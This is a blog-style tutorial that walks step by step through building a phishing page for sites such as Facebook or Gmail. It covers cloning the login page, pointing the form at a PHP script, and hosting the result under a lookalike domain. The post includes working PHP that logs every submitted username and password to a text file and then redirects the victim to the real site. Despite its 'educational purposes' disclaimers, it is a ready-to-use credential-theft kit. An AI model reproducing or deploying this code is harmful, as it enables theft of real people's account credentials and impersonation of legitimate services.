Phishing has become a very easy to use trick to hack usernames and passwords of users.
Today I will teach you guys how to create phishing page for almost any site which uses login form (for example:Facebook,
Gmail, Yahoo, etc)
For makin a phishing page and using this method of hacking you need a hosting site(Google it for free web hosting sites)
or your website also.
Register yourself at a free hosting site.
Note: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.
Well as now you have a hosting account, lets start to create the Phising Page
Step one.
First go to the target site. In your browser select Save As from the File menu and save the site on
your computer with name "login.html" .
or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file.
Rename the file with "login.html".
Now the step two.
Open up your Notepad and copy this into it
<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Replace facebook.com with the URL you want the user to redirect after he click on login button.
Save the page as Phish.php
Now you need to edit the "login.htm" file we have saved earlier. So navigate to that and open it with notepad.
now search for any html like "action=" which has something with login. And replace the URL with "Phish.php".
Also create a blank txt file with name "log.txt". This file would be used to save the victims logins and passwords.
Now you are done with making the Phishing Page.
Go to your hosting account and upload all the files to your server. You should upload all three files
Now go to the URL provided by your host.
Like - http://faceboook-1.hostingsite.com/login.htm
And you would see the Phishing page as it is in the real site.
For testing type anything on the login and password field and hit login button.
Check the log.txt file. The password and username you entered previously would be saved in the log.txt file.
WOW, you just have your own phishing page now.
Note: If you have any doubts or where to create a hosting account feel free to comment. I will try to reply to you as soon as possible.
ONCE AGAIN NOTE: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.
No comments:
Post a Comment